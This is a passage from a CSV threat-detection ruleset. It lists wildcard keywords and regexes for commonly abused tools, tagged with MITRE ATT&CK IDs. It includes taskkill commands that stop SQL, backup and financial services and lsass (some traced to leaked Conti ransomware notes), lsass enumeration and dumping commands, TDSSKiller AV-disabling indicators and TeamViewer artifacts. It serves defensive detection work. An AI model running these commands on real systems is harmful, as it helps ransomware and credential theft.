/F*",".{0,1000}taskkill\s\/im\swordpad\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Text Editor","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*taskkill /im xfssvccon.exe /F*",".{0,1000}taskkill\s\/im\sxfssvccon\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Financial Service","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*taskkill /im zoolz.exe 
/F*",".{0,1000}taskkill\s\/im\szoolz\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Backup Service","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*taskkill -f -im fdhost.exe*",".{0,1000}taskkill\s\-f\s\-im\sfdhost\.exe.{0,1000}","greyware_tool_keyword","taskkill","terminate processes related to SQL servers","T1489","TA0040","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*taskkill -f -im fdlauncher.exe*",".{0,1000}taskkill\s\-f\s\-im\sfdlauncher\.exe.{0,1000}","greyware_tool_keyword","taskkill","terminate processes related to SQL servers","T1489","TA0040","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*taskkill -f -im fdlauncher.exe*",".{0,1000}taskkill\s\-f\s\-im\sfdlauncher\.exe.{0,1000}","greyware_tool_keyword","taskkill","terminate processes related to SQL servers","T1489","TA0040","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*taskkill -f -im MsDtsSrvr.exe*",".{0,1000}taskkill\s\-f\s\-im\sMsDtsSrvr\.exe.{0,1000}","greyware_tool_keyword","taskkill","terminate processes related to SQL servers","T1489","TA0040","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*taskkill -f -im 
msftesql.exe*",".{0,1000}taskkill\s\-f\s\-im\smsftesql\.exe.{0,1000}","greyware_tool_keyword","taskkill","terminate processes related to SQL servers","T1489","TA0040","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*taskkill -f -im msmdsrv.exe*",".{0,1000}taskkill\s\-f\s\-im\smsmdsrv\.exe.{0,1000}","greyware_tool_keyword","taskkill","terminate processes related to SQL servers","T1489","TA0040","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*taskkill -f -im pg_ctl.exe*",".{0,1000}taskkill\s\-f\s\-im\spg_ctl\.exe.{0,1000}","greyware_tool_keyword","taskkill","terminate processes related to SQL servers","T1489","TA0040","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*taskkill -f -im postgres.exe*",".{0,1000}taskkill\s\-f\s\-im\spostgres\.exe.{0,1000}","greyware_tool_keyword","taskkill","terminate processes related to SQL servers","T1489","TA0040","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*taskkill -f -im ReportingServicesService.exe*",".{0,1000}taskkill\s\-f\s\-im\sReportingServicesService\.exe.{0,1000}","greyware_tool_keyword","taskkill","terminate processes related to SQL servers","T1489","TA0040","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*taskkill -f -im 
SQLAGENT.EXE*",".{0,1000}taskkill\s\-f\s\-im\sSQLAGENT\.EXE.{0,1000}","greyware_tool_keyword","taskkill","terminate processes related to SQL servers","T1489","TA0040","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*taskkill -f -im sqlbrowser.exe*",".{0,1000}taskkill\s\-f\s\-im\ssqlbrowser\.exe.{0,1000}","greyware_tool_keyword","taskkill","terminate processes related to SQL servers","T1489","TA0040","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*taskkill -f -im sqlceip.exe*",".{0,1000}taskkill\s\-f\s\-im\ssqlceip\.exe.{0,1000}","greyware_tool_keyword","taskkill","terminate processes related to SQL servers","T1489","TA0040","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*taskkill -f -im sqlservr.exe*",".{0,1000}taskkill\s\-f\s\-im\ssqlservr\.exe.{0,1000}","greyware_tool_keyword","taskkill","terminate processes related to SQL servers","T1489","TA0040","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*taskkill -f -im sqlservr.exe*",".{0,1000}taskkill\s\-f\s\-im\ssqlservr\.exe.{0,1000}","greyware_tool_keyword","taskkill","terminate processes related to SQL servers","T1489","TA0040","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*taskkill -f -im sqlwriter.exe*",".{0,1000}taskkill\s\-f\s\-im\ssqlwriter\.exe.{0,1000}","greyware_tool_keyword","taskkill","terminate processes 
related to SQL servers","T1489","TA0040","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*taskkill -f -im Ssms.exe*",".{0,1000}taskkill\s\-f\s\-im\sSsms\.exe.{0,1000}","greyware_tool_keyword","taskkill","terminate processes related to SQL servers","T1489","TA0040","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*taskkill.exe /F /IM lsass.exe*",".{0,1000}taskkill\.exe\s\/F\s\/IM\slsass\.exe.{0,1000}","greyware_tool_keyword","taskkill","killing lsass process","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://x.com/malmoeb/status/1741114854037987437","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*taskkill.exe /F /IM msiexec.exe*",".{0,1000}taskkill\.exe\s\/F\s\/IM\smsiexec\.exe.{0,1000}","greyware_tool_keyword","taskkill","evade EDR/AV by repairing with msiexec and killing the process","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://badoption.eu/blog/2024/03/23/cortex.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*tasklist /fi *Imagename eq lsass.exe*",".{0,1000}tasklist\s\/fi\s.{0,1000}Imagename\seq\slsass\.exe.{0,1000}","greyware_tool_keyword","tasklist","This might indicate an attempt to dump credentials. Investigate the process tree.","T1555","TA0006 - TA0007","N/A","APT5 - APT29 - OilRig - Ke3chang - Earth Lusca - Volt Typhoon - APT1 - Threat Group-3390 - Deep Panda - Turla - Naikon","Credential Access","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*tasklist /svc | findstr /i ""vmtoolsd.exe""*",".{0,1000}tasklist\s\/svc\s\|\sfindstr\s\/i\s\""vmtoolsd\.exe\"".{0,1000}","greyware_tool_keyword","tasklist","commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). 
This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","APT5 - APT29 - OilRig - Ke3chang - Earth Lusca - Volt Typhoon - APT1 - Threat Group-3390 - Deep Panda - Turla - Naikon","Discovery","https://github.com/ice-wzl/wmiexec2","1","1","N/A","N/A","9","1","27","1","2024-06-12T17:56:15Z","2023-02-07T22:10:08Z" "*\lsassC:\Windows\System32\Taskmgr.exe*",".{0,1000}\\\lsass\<\/Data\>\C\:\\Windows\\System32\\Taskmgr\.exe\<\/Data\>.{0,1000}","greyware_tool_keyword","Taskmgr","dump lsass process with Taskmgr","T1003.001","TA0006","N/A","N/A","Credential Access","https://learn.microsoft.com/en-us/sysinternals/downloads/procdump","1","0","N/A","pipe connect ED 18 sysmon","10","10","N/A","N/A","N/A","N/A" "*tcpdump *",".{0,1000}tcpdump\s.{0,1000}","greyware_tool_keyword","tcpdump","A powerful command-line packet analyzer and libpcap - a portable C/C++ library for network traffic capture","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","http://www.tcpdump.org/","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*/TDSSKiller.exe*",".{0,1000}\/TDSSKiller\.exe.{0,1000}","greyware_tool_keyword","TDSKiller","TDSKiller detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","LockBit - Avaddon","Defense Evasion","https://www.majorgeeks.com/files/details/kaspersky_tdsskiller.html","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*/tdsskiller.zip*",".{0,1000}\/tdsskiller\.zip.{0,1000}","greyware_tool_keyword","TDSKiller","TDSKiller detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","LockBit - Avaddon","Defense 
Evasion","https://www.majorgeeks.com/files/details/kaspersky_tdsskiller.html","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*\TDSSKiller.exe*",".{0,1000}\\TDSSKiller\.exe.{0,1000}","greyware_tool_keyword","TDSKiller","TDSKiller detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","LockBit - Avaddon","Defense Evasion","https://www.majorgeeks.com/files/details/kaspersky_tdsskiller.html","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*\tdsskiller.zip*",".{0,1000}\\tdsskiller\.zip.{0,1000}","greyware_tool_keyword","TDSKiller","TDSKiller detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","LockBit - Avaddon","Defense Evasion","https://www.majorgeeks.com/files/details/kaspersky_tdsskiller.html","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*>TDSS rootkit removing tool<*",".{0,1000}\>TDSS\srootkit\sremoving\stool\<.{0,1000}","greyware_tool_keyword","TDSKiller","TDSKiller detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","LockBit - Avaddon","Defense Evasion","https://www.majorgeeks.com/files/details/kaspersky_tdsskiller.html","1","0","#description","N/A","8","10","N/A","N/A","N/A","N/A" "*>TDSSKiller<*",".{0,1000}\>TDSSKiller\<.{0,1000}","greyware_tool_keyword","TDSKiller","TDSKiller detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","LockBit - Avaddon","Defense Evasion","https://www.majorgeeks.com/files/details/kaspersky_tdsskiller.html","1","0","#productname","N/A","8","10","N/A","N/A","N/A","N/A" 
"*2d823c8b6076e932d696e8cb8a2c5c5df6d392526cba8e39b64c43635f683009*",".{0,1000}2d823c8b6076e932d696e8cb8a2c5c5df6d392526cba8e39b64c43635f683009.{0,1000}","greyware_tool_keyword","TDSKiller","TDSKiller detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","LockBit - Avaddon","Defense Evasion","https://www.majorgeeks.com/files/details/kaspersky_tdsskiller.html","1","0","#filehash","N/A","8","10","N/A","N/A","N/A","N/A" "*http://support.kaspersky.com/viruses/tdsskiller.xmlt*",".{0,1000}http\:\/\/support\.kaspersky\.com\/viruses\/tdsskiller\.xmlt.{0,1000}","greyware_tool_keyword","TDSKiller","TDSKiller detect and remove malware - including rootkits but is also abused by attackers to disable antivirus","T1562 - T1055 - T1070","TA0005 - TA0004","N/A","LockBit - Avaddon","Defense Evasion","https://www.majorgeeks.com/files/details/kaspersky_tdsskiller.html","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*.exe --IPCport 5939 --Module 1*",".{0,1000}\.exe\s\-\-IPCport\s5939\s\-\-Module\s1.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","1","N/A","https://github.com/SigmaHQ/sigma/pull/4759","10","10","N/A","N/A","N/A","N/A" "*.router.teamviewer.com*",".{0,1000}\.router\.teamviewer\.com.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - 
Yanluowang","RMM","https://www.teamviewer.com/","1","1","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A" "*/Create /TN TVInstallRestore /TR *",".{0,1000}\/Create\s\/TN\sTVInstallRestore\s\/TR\s.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A" "*\AppData\Roaming\TeamViewer*",".{0,1000}\\AppData\\Roaming\\TeamViewer.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A" "*\CurrentControlSet\Services\TeamViewer*",".{0,1000}\\CurrentControlSet\\Services\\TeamViewer.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A" "*\Program Files\TeamViewer*",".{0,1000}\\Program\sFiles\\TeamViewer.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by 
attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A" "*\RemoteSupport\127.0.0.1.tvc*",".{0,1000}\\RemoteSupport\\127\.0\.0\.1\.tvc.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A" "*\Services\TeamViewer\*",".{0,1000}\\Services\\TeamViewer\\.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","#registry","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A" "*\Software\TeamViewer\Temp*",".{0,1000}\\Software\\TeamViewer\\Temp.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A" "*\TeamViewer.exe*",".{0,1000}\\TeamViewer\.exe.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is 
software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A" "*\TeamViewer\Connections.txt*",".{0,1000}\\TeamViewer\\Connections\.txt.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A" "*\TeamViewer\Connections_incoming.txt*",".{0,1000}\\TeamViewer\\Connections_incoming\.txt.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A" "*\TeamViewer_.ex*",".{0,1000}\\TeamViewer_\.ex.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A" 
"*\teamviewer_note.exe*",".{0,1000}\\teamviewer_note\.exe.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A" "*\TeamViewerSession\shell\open*",".{0,1000}\\TeamViewerSession\\shell\\open.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A" "*\TeamViewerTermsOfUseAccepted*",".{0,1000}\\TeamViewerTermsOfUseAccepted.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A" "*\TV15Install.log*",".{0,1000}\\TV15Install\.log.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - 
Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A" "*\TVExtractTemp\TeamViewer_Resource_*",".{0,1000}\\TVExtractTemp\\TeamViewer_Resource_.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A" "*\TVExtractTemp\tvfiles.7z*",".{0,1000}\\TVExtractTemp\\tvfiles\.7z.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A" "*\TvGetVersion.dll*",".{0,1000}\\TvGetVersion\.dll.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A" "*\TVNetwork.log*",".{0,1000}\\TVNetwork\.log.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - 
TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A" "*\TVWebRTC.dll*",".{0,1000}\\TVWebRTC\.dll.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A" "*\Users\Public\Desktop\TVTest.tmp*",".{0,1000}\\Users\\Public\\Desktop\\TVTest\.tmp.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A" "*\Windows\Temp\TeamViewer*",".{0,1000}\\Windows\\Temp\\TeamViewer.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A" "*AppData\Local\Temp\TeamViewer*",".{0,1000}AppData\\Local\\Temp\\TeamViewer.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other 
terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A" "*AppData\Roaming\Microsoft\Windows\SendTo\TeamViewer.lnk*",".{0,1000}AppData\\Roaming\\Microsoft\\Windows\\SendTo\\TeamViewer\.lnk.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A" "*client.teamviewer.com*",".{0,1000}client\.teamviewer\.com.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","1","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A" "*download.teamviewer.com.cdn.cloudflare.net*",".{0,1000}download\.teamviewer\.com\.cdn\.cloudflare\.net.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","1","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A" 
"*HKLM\SOFTWARE\TeamViewer*",".{0,1000}HKLM\\SOFTWARE\\TeamViewer.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","1","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A" "*MRU\RemoteSupport\127.0.0.1.tvc*",".{0,1000}MRU\\RemoteSupport\\127\.0\.0\.1\.tvc.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A" 